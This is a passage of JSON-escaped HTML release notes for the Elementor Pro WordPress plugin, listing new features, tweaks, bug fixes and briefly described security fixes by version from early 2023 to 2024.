href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23875\\\">#23875<\\/a>)<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Login widget<\\/li>\\n<li>Tweak: Added additional style controls in the Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration option in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21295\\\">#21295<\\/a>)<\\/li>\\n<li>Tweak: Added Transition Duration to button in Flip Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Author Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to List in Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Login widget<\\/li>\\n<li>Tweak: Added Transition Duration in Post Navigation widget<\\/li>\\n<li>Tweak: Added Transition Duration Show More in Video Playlist widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Form widget<\\/li>\\n<li>Tweak: Removed separator-none argument from all Editor controls<\\/li>\\n<li>Tweak: Add <code><time><\\/code> wrapper for Date and Time items in Post Info widget<\\/li>\\n<li>Tweak: Page Transitions feature merged to version<\\/li>\\n<li>Tweak: Scroll Snap feature merged to version<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Beta status and activated for new sites<\\/li>\\n<li>Tweak: Promoted Taxonomy Filter feature to beta status and activated for new sites<\\/li>\\n<li>Fix: Page Transitions feature and Load Font Awesome 4 Support cause a console error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18885\\\">#18885<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19334\\\">#19334<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21082\\\">#21082<\\/a>)<\\/li>\\n<li>Fix: Added better output escaping in Taxonomy Filter widget<\\/li>\\n<\\/ul>\\n<h4>3.19.3 - 2024-02-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved Loop CSS loading structure in Loop Grid item<\\/li>\\n<li>Security Fix: Addressed security weaknesses in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.19.2 - 2024-02-07<\\/h4>\\n<ul>\\n<li>Fix: Export data inconsistencies when using form actions in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.19.1 - 2024-02-05<\\/h4>\\n<ul>\\n<li>Fix: Enqueuing non-existing Loop Template CSS file in Loop Item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24959\\\">#24959<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>3.19.0 - 2024-01-29<\\/h4>\\n<ul>\\n<li>New: Introducing Display Conditions for Elements - allowing users to customize content visibility based on specified criteria (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4246\\\">#4246<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21152\\\">#21152<\\/a>)<\\/li>\\n<li>New: Implemented Akismet Integration for enhanced spam protection and security in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11401\\\">#11401<\\/a>)<\\/li>\\n<li>New: Introducing Permissions functionality to Element Manager - providing users with enhanced control over access and management capabilities<\\/li>\\n<li>Tweak: Added styling option for dropdown indicator in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21907\\\">#21907<\\/a>)<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Implemented CSS logical properties in WordPress Menu widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Reviews widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Countdown widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Updated <code>jquery.smartmenus.js<\\/code> version from 1.1.1 to 1.2.0<\\/li>\\n<li>Fix: Dynamic Background Image does not load on the first Loop Item in a Loop Grid (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21489\\\">#21489<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22368\\\">#22368<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23085\\\">#23085<\\/a>)<\\/li>\\n<li>Fix: History panel deprecation notices in console log<\\/li>\\n<li>Fix: Second Pro rollback installed the latest version instead of the specifically selected older version<\\/li>\\n<li>Fix: Incorrect position of the dropdown content when applying entrance animation in Menu Widget<\\/li>\\n<li>Fix: UX issues when using in-place editing in Menu widget<\\/li>\\n<li>Fix: Pagination with page reload is not working when used with the Taxonomy filter and Loop Grid widget in Archive template<\\/li>\\n<\\/ul>\\n<h4>3.18.2 - 2023-12-20<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Price List widget<\\/li>\\n<li>Fix: Error messages related to loop filter appear on front when using PHP 8.X and <code>WP_DEBUG<\\/code> is true<\\/li>\\n<\\/ul>\\n<h4>3.18.1 - 2023-12-06<\\/h4>\\n<ul>\\n<li>Fix: No results appeared when reloading the page with deep link and de-selecting terms in Taxonomy Filter widget<\\/li>\\n<li>Fix: No results appeared when filtering the Uncategorized category in Filter Taxonomy widget<\\/li>\\n<li>Fix: Notes still available when the Notes feature is deactivated<\\/li>\\n<\\/ul>\\n<h4>3.18.0 - 2023-12-04<\\/h4>\\n<ul>\\n<li>Tweak: Added the ability to upload files as attachments to emails in the File Upload field in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4868\\\">#4868<\\/a>)<\\/li>\\n<li>Tweak: Introduced the capability to design and edit the empty state in the Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24261\\\">#24261<\\/a>)<\\/li>\\n<li>Tweak: Implemented the option to close the menu content area with a click anywhere on the screen in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22686\\\">#22686<\\/a>)<\\/li>\\n<li>Tweak: Improve scrolling behavior inside the content area when there is not enough space in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22712\\\">#22712<\\/a>)<\\/li>\\n<li>Tweak: Expanded breakpoint options in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22488\\\">#22488<\\/a>)<\\/li>\\n<li>Tweak: Added Logical Combination control in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added additional units to Horizontal and Vertical padding for Dropdown in WordPress Menu widget<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in Loop Carousel and Carousel widgets<\\/li>\\n<li>Tweak: Added various HTML Tag controls in Video Playlist widget<\\/li>\\n<li>Tweak: Added responsive control to navigation size in Slides, Reviews, Media Carousel and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Search Form widget<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added Multiple Selection control in Taxonomy Filter widget<\\/li>\\n<li>Fix: Deprecated notice when using ${var} in strings instead of {$var} with PHP 8.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23927\\\">#23927<\\/a>)<\\/li>\\n<li>Fix: Dropdown indicator position issue in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23947\\\">#23947<\\/a>)<\\/li>\\n<li>Fix: Dynamic Tags are not available when choosing \'self-hosted\' source in Video widget<\\/li>\\n<li>Fix: Telephone field placeholder is aligned to the left in RTL websites in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.17.1 - 2023-11-01<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Code Highlight, Form, Lottie, Price List, and Video Playlist widgets<\\/li>\\n<\\/ul>\\n<h4>3.17.0 - 2023-10-25<\\/h4>\\n<ul>\\n<li>Tweak: Added AJAX pagination option or seamless page navigation between content in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>)<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Post widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Loop Grid widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Added a None option to the breakpoint options in Menu widget<\\/li>\\n<li>Tweak: Added a horizontal scrolling option in Menu widget<\\/li>\\n<li>Tweak: Upgraded minimum required PHP version to 7.3<\\/li>\\n<li>Tweak: Improved accessibility when minimize button is disabled in Table of Content widget<\\/li>\\n<li>Fix: Table of Content widget without icons displays <code>undefined<\\/code> error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17523\\\">#17523<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17768\\\">#17768<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18463\\\">#18463<\\/a>)<\\/li>\\n<li>Fix: Hover behavior issues on menu items in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23430\\\">#23430<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22431\\\">#22431<\\/a>)<\\/li>\\n<li>Fix: Links inside Loop Carousel are not working on initial load in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23705\\\">#23705<\\/a>)<\\/li>\\n<li>Fix: Popups accessible navigation adds outlines to the wrong first focusable element<\\/li>\\n<li>Fix: Dropdown area aligned to the left side of the screen if contains Tabs widget in Menu widget<\\/li>\\n<li>Fix: Content horizontal position not aligning correctly when used with carousel widgets in Menu widget<\\/li>\\n<li>Fix: Accessibility errors in PageSpeed Insights in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.16.2 - 2023-09-20<\\/h4>\\n<ul>\\n<li>Fix: Fit to Content dropdown position calculation is incorrect in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23808\\\">#23808<\\/a>)<\\/li>\\n<li>Fix: Reverted hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23804\\\">#23804<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.16.1 - 2023-09-14<\\/h4>\\n<ul>\\n<li>Fix: Dynamic tag for ACF image field is not working as expected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23757\\\">#23757<\\/a>)<\\/li>\\n<li>Fix: Sticky functionality affects padding values in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23758\\\">#23758<\\/a>)<\\/li>\\n<li>Fix: HTML list issues for padding and margin in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.16.0 - 2023-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23607\\\">#23607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22554\\\">#22554<\\/a>)<\\/li>\\n<li>Fix: \'Fallback: Recent Posts\' option malfunctions in the Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21436\\\">#21436<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23259\\\">#23259<\\/a>)<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22056\\\">#22056<\\/a>)<\\/li>\\n<li>Tweak: Used appropriate image <code>alt<\\/code> in Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17680\\\">#17680<\\/a>)<\\/li>\\n<li>Tweak: Optimized Scroll Snap functionality when using Container widget<\\/li>\\n<li>Tweak: Enhanced Elementor Role Manager functionality when using Containers<\\/li>\\n<li>Tweak: Added Notes feature to the Editor Top Bar<\\/li>\\n<li>Tweak: Replace CSS <code>float<\\/code> with other layouts in the Editor<\\/li>\\n<li>Tweak: Upgraded HTML Structure for the Menu widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Carousel and Menu widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to a link in Posts widget<\\/li>\\n<li>Tweak: Loop Builder feature merged to version<\\/li>\\n<li>Fix: Addressed inconsistency in hover effect durations between icon, dropdown indicator colors, and text colors in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22376\\\">#22376<\\/a>)<\\/li>\\n<li>Fix: Slides break if the parent container is set to HTML A tag in Loop Carousel and Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22678\\\">#22678<\\/a>)<\\/li>\\n<li>Fix: The icon size setting is not affecting uploaded SVG icons in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22372\\\">#22372<\\/a>)<\\/li>\\n<li>Fix: Taxonomy filter does not work with slug in foreign characters (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23315\\\">#23315<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Dynamic Tags<\\/li>\\n<li>Fix: Sticky container incorrectly adjusts its width when transitioning from a smaller breakpoint to a larger one within the Editor<\\/li>\\n<\\/ul>\\n<h4>3.15.1 - 2023-08-09<\\/h4>\\n<ul>\\n<li>Fix: Improved code security enforcement in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.15.0 - 2023-07-31<\\/h4>\\n<ul>\\n<li>New: Introducing Taxonomy Filter widget - Empower visitors to seamlessly filter listings in Loop Grids based on taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3140\\\">#3140<\\/a>)<\\/li>\\n<li>Tweak: Added an "Offset Sides" functionality in Carousel and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21114\\\">#21114<\\/a>)<\\/li>\\n<li>Tweak: Modified the size of the Publish button in the Editor Top Bar feature (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22472\\\">#22472<\\/a>)<\\/li>\\n<li>Tweak: Improved Ajax permissions functionality for better security enforcement<\\/li>\\n<li>Tweak: Added option for pagination custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added option for navigation custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added additional styling options for navigation in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added labels to shortcode column in WordPress admin<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in Menu widget<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in My Account widget<\\/li>\\n<li>Tweak: Improved panel UI in Video Playlist widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Price List widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Slides widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Flip Box widget<\\/li>\\n<li>Tweak: Added "Description HTML Tag" in Call To Action widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Share Buttons widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: WooCommerce Status page failed to recognize Elementor WooCommerce widgets<\\/li>\\n<li>Fix: Pagination does not work inside single templates when using Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Incorrect saving of WooCommerce page settings in Elementor site settings under certain scenarios<\\/li>\\n<\\/ul>\\n<h4>3.14.1 - 2023-06-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved navigation on touch devices in Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22827\\\">#22827<\\/a>)<\\/li>\\n<li>Fix: Missing navigation arrows on lightbox in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22870\\\">#22870<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.14.0 - 2023-06-19<\\/h4>\\n<ul>\\n<li>New: Introducing Carousel widget - Infinite design possibilities, and nesting capabilities (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2587\\\">#2587<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>Tweak: Added Static Item Position functionality to Alternate template in Loop Grid widget<\\/li>\\n<li>Tweak: Added visual indication of Page Parts<\\/li>\\n<li>Tweak: Added dividers option between menu items in Menu widget<\\/li>\\n<li>Tweak: Changed the HTML structure of Pagination and Navigation in Loop Carousel and Nested Carousel widgets<\\/li>\\n<li>Tweak: Added shop page in WooCommerce Pages section in Site Settings<\\/li>\\n<li>Tweak: Added Text Shadow, Box Shadow and Padding control to button in Call to Action widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Video Playlist widget<\\/li>\\n<li>Tweak: Added <code>alt<\\/code> attribute to images in Video Playlist widget<\\/li>\\n<li>Tweak: Replaced select control with choose control for Flip Direction control in Flip Box widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Use <code>media_types<\\/code> array in Media controls<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11193\\\">#11193<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19871\\\">#19871<\\/a>)<\\/li>\\n<li>Fix: Responsive settings for templates don\'t work as expected when Additional Custom Breakpoints feature is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16819\\\">#16819<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19394\\\">#19394<\\/a>)<\\/li>\\n<li>Fix: Inner containers are not presented as expected in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21813\\\">#21813<\\/a>)<\\/li>\\n<li>Fix: Popup width does not support percentages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22413\\\">#22413<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x throws errors when using WooCommerce Ajax response (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22199\\\">#22199<\\/a>)<\\/li>\\n<li>Fix: Mini cart template appears as empty in various scenarios in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22789\\\">#22789<\\/a>)<\\/li>\\n<li>Fix: Order by Price doesn\'t work for the Latest products or Manual Selection in Products widget<\\/li>\\n<li>Fix: Dropdown indicator icon is not vertically aligned to the text when using icon in Menu Widget<\\/li>\\n<li>Fix: Mixed content warning in the console for Video Playlist widget<\\/li>\\n<li>Fix: Preview settings are not presented as expected after first save in Loop Template<\\/li>\\n<li>Fix: Not-crawlable link error in Video Playlist widget<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Logo widget<\\/li>\\n<li>Fix: Focus state issue on page load when using Table of Content widget<\\/li>\\n<\\/ul>\\n<h4>3.13.2 - 2023-05-22<\\/h4>\\n<ul>\\n<li>Fix: Hover settings not working as expected on Touch-Enabled devices in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22258\\\">#22258<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.1 - 2023-05-11<\\/h4>\\n<ul>\\n<li>Security Fix: Addressed security weaknesses in access management related functions<\\/li>\\n<li>Fix: Excerpt content pulled from post content is showing with HTML tags in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22367\\\">#22367<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.0 - 2023-05-08<\\/h4>\\n<ul>\\n<li>Tweak: Provided an option to assign excerpt automatically from post content in Post Excerpt dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20256\\\">#20256<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21715\\\">#21715<\\/a>)<\\/li>\\n<li>Tweak: Added Display Conditions functionality in Editor Top bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21675\\\">#21675<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22050\\\">#22050<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor_page_id<\\/code> from request URLs in the WC AJAX calls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18675\\\">#18675<\\/a>)<\\/li>\\n<li>Tweak: Added icons to menu items in Mega Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/21602\\\">#21602<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility to Toggle Button in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/2348\\\">#2348<\\/a>)<\\/li>\\n<li>Tweak: Added \'Active item state\' to top-level menu items for anchor links in the Menu widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Loop Carousel widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Slides widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Media, Testimonial and Reviews Carousel widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to Table of Content widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Search Form widget<\\/li>\\n<li>Tweak: Added accessibility to images in Slides widget<\\/li>\\n<li>Tweak: Added accessibility to images in Call To Action widget<\\/li>\\n<li>Tweak: Added accessibility to images in Media Carousel widget<\\/li>\\n<li>Tweak: Added accessibility to images in Gallery widget<\\/li>\\n<li>Tweak: Added Lazy Load support for avatar image in Post Info widget<\\/li>\\n<li>Tweak: Added Lazy Load support to various Elementor Editor and Admin images<\\/li>\\n<li>Tweak: Added Lazy Load support for author image in Author Box widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Price List widget<\\/li>\\n<li>Fix: Content width is affected by the widget\'s width when Content Width is set to Fit to Content in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21842\\\">#21842<\\/a>)<\\/li>\\n<li>Fix: Empty value on Rows field causes an error in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21451\\\">#21451<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.2 - 2023-04-09<\\/h4>\\n<ul>\\n<li>Fix: Mini cart template appears as empty in various WordPress themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21836\\\">#21836<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.1 - 2023-04-02<\\/h4>\\n<ul>\\n<li>Fix: Default background colors are presented as transparent in Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21824\\\">#21824<\\/a>)<\\/li>\\n<li>Fix: Reverted the tweak of Form Submissions feature merged to the version (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21821\\\">#21821<\\/a>)<\\/li>\\n<li>Fix: Dropdown area is not closing when hovering outside of the content area in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.12.0 - 2023-03-29<\\/h4>\\n<ul>\\n<li>New: Introducing the Mega Menu with the new Menu widget - empowers you to achieve a much higher level of menu design, customization, and creativity<\\/li>\\n<li>New: Diversify your design with a Loop Alternate template - apply another template within your Loop Grid for design creativity<\\/li>\\n<li>New: Kickstart your workflow with predesigned Loop container-based templates<\\/li>\\n<li>Tweak: Added custom icon controls to various locations in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13678\\\">#13678<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17941\\\">#17941<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19295\\\">#19295<\\/a>)<\\/li>\\n<li>Tweak: Added a spacing control between navigation and slides in the Loop Carousel<\\/li>\\n<li>Tweak: Added responsive control to the \'Gap between slides\' control in the Loop Carousel<\\/li>\\n<li>Tweak: Added Custom CSS section in Loop Item template<\\/li>\\n<li>Tweak: Added an Article class metadata in Loop Item template<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in CTA widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in Flipbox widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Changed Nav Menu widget name to WordPress Menu widget<\\/li>\\n<li>Tweak: Added "Form Validation" control to Form widget<\\/li>\\n<li>Tweak: Updated custom messages in the Form widget<\\/li>\\n<li>Tweak: Improved accessibility in various elements in Gallery widget<\\/li>\\n<li>Tweak: Form Submissions feature merged to version<\\/li>\\n<li>Tweak: Loop feature promoted to Stable status<\\/li>\\n<li>Tweak: Page Transitions feature promoted to Stable status<\\/li>\\n<li>Tweak: Improved accessibility in filter bar in Gallery widget<\\/li>\\n<li>Tweak: Remove unused <code>aspect-ratio-*<\\/code> CSS classes<\\/li>\\n<li>Fix: Not all active breakpoints appear under "Advanced Rules" in popup publish settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17020\\\">#17020<\\/a>)<\\/li>\\n<li>Fix: Dynamic background image and video is not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.11.7 - 2023-03-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in WooCommerce components<\\/li>\\n<\\/ul>\\n<h4>3.11.6 - 2023-03-14<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in Author Box and Countdown widgets<\\/li>\\n<\\/ul>\\n<h4>3.11.5 - 2023-03-12<\\/h4>\\n<ul>\\n<li>Fix: Hamburger Menu Toggle not showing if breakpoint is set to Tablet Extra in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21003\\\">#21003<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.4 - 2023-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Prevented SVG file upload for better security enforcement in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.11.3 - 2023-02-26<\\/h4>\\n<ul>\\n<li>Fix: Error message appears when submitting a form placed below Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21432\\\">#21432<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x compatibility issues in various places<\\/li>\\n<\\/ul>\\n<h4>3.11.2 - 2023-02-22<\\/h4>\\n<ul>\\n<li>Fix: Save & Back handle becomes inaccessible in various scenarios cases in Loop Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21316\\\">#21316<\\/a>)<\\/li>\\n<li>Fix: Can\'t edit page when using \'Content Tabs\' and \'Section\' options in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.11.1 - 2023-02-15<\\/h4>\\n<ul>\\n<li>Fix: Featured Image dynamic tag is not working in Background images (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21313\\\">#21313<\\/a>)<\\/li>\\n<li>Fix: Time zone is not correct in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17485\\\">#17485<\\/a>)<\\/li>\\n<li>Fix: File upload field is not working in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21341\\\">#21341<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21314\\\">#21314<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.0 - 2023-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Carousel widget - Create powerful & repeating loop templates and populate each one with dynamic content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>New: Added Date and Time Range option to Advanced Rules in Popup<\\/li>\\n<li>Tweak: Improved accessibility when opening and closing a popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9788\\\">#9788<\\/a>)<\\/li>\\n<li>Tweak: Improved accessibility of full-screen mode in Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19907\\\">#19907<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility support to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5861\\\">#5861<\\/a>)<\\/li>\\n<li>Tweak: Add <code>aria-label<\\/code> to read more link in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13784\\\">#13784<\\/a>)<\\/li>\\n<li>Tweak: Use <code>aspect-ratio<\\/code> property instead of CSS trick in Media Carousel widget<\\/li>\\n<li>Tweak: Updated translation string in Stripe widget<\\/li>\\n<li>Fix: Masonry and Columns controls are not working as expected with responsive in 